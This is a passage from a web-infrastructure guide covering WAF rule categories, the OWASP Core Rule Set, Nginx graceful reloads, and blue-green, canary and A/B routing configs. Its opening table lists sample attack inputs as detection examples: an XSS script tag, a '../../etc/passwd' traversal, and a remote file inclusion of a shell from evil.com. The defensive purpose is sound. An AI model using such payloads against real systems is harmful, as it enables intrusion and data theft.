Cross-Site Scripting (XSS) <script>alert(1)</script> Detect HTML/JS in input fields
Path Traversal ../../etc/passwd Detect directory traversal patterns
HTTP Protocol Violations Malformed headers, invalid methods Enforce HTTP spec compliance
Bot Traffic Scrapers, credential stuffing Rate limiting, CAPTCHA, bot signatures
File Inclusion include=http://evil.com/shell.php Block remote file references

OWASP Core Rule Set (CRS) is the standard open-source WAF rule set, covering the OWASP Top 10 vulnerabilities. It runs on ModSecurity (Nginx/Apache module), Coraza (Go), and cloud WAFs.

Cloud WAFs (AWS WAF, Cloudflare WAF, Azure WAF) provide managed rule sets and are simpler to operate than self-hosted solutions. AWS WAF integrates with ALB and CloudFront, inspecting requests at the edge before they reach your backend.

False positives are the biggest operational challenge with WAFs. A legitimate request containing the word SELECT (e.g., a product named "Select Premium") might be blocked by SQL injection rules. Manage false positives with: a learning mode/logging-only period before enforcement, per-rule exceptions, URI-specific rule overrides, and regular rule tuning.

Production Deployment Patterns

Zero-Downtime Deployments with Nginx

Nginx supports graceful reloads (nginx -s reload) that enable zero-downtime configuration changes:

  1. Master process spawns new worker processes with the new configuration
  2. Master process signals old worker processes to stop accepting new connections
  3. Old workers finish processing active requests, then exit
  4. Only new workers remain, running the updated configuration

No connections are dropped during this process.

Blue-Green with Proxy Switching

# Blue-green deployment: switch backends by changing upstream

# Active (green):
upstream app_backend {
    server 10.0.1.10:8080;    # Green instances
    server 10.0.1.11:8080;
}

# To switch to blue, update config and reload:
# upstream app_backend {
#     server 10.0.2.10:8080;  # Blue instances
#     server 10.0.2.11:8080;
# }

Canary Releases via Weighted Routing

# Route 5% of traffic to canary, 95% to stable
upstream app_stable {
    server 10.0.1.10:8080;
    server 10.0.1.11:8080;
}

upstream app_canary {
    server 10.0.2.10:8080;
}

split_clients "${remote_addr}" $upstream_variant {
    5%   canary;
    *    stable;
}

server {
    location /api/ {
        if ($upstream_variant = "canary") {
            proxy_pass http://app_canary;
        }
        proxy_pass http://app_stable;
    }
}

A/B Testing at the Proxy Layer

# Route users to different backends based on cookie
map $cookie_ab_group $backend {
    "A"     app_variant_a;
    "B"     app_variant_b;
    default app_variant_a;
}

upstream app_variant_a {
    server 10.0.1.10:8080;
}

upstream app_variant_b {
    server 10.0.2.10:8080;
}

server {
    location /api/ {
        # Set A/B cookie if not present
        if ($cookie_ab_group = "") {
            add_header Set-Cookie "ab_group=A; Path=/; Max-Age=2592000";
            # (In practice, randomize A/B assignment with a map or Lua script)
        }
        proxy_pass http://$backend;
    }
}

Comparison Summary

Feature Nginx Apache Caddy HAProxy Traefik
Primary role Web server + proxy Web server Web server + proxy Load balancer + proxy Proxy + discovery
Auto HTTPS No (use certbot) No (use certbot) Yes (built-in) No Yes (built-in)
Config language Custom DSL Custom DSL Caddyfile / JSON Custom DSL YAML / labels
Dynamic config Reload required .htaccess (per-dir) API + hot reload Reload required Auto-discovery
K8s integration Ingress controller Limited Ingress controller Ingress controller Native (CRDs)
Performance Excellent Good Good Excellent Good
Best for General-purpose Legacy, mod_php Simple setups, auto-TLS High-perf LB Container environments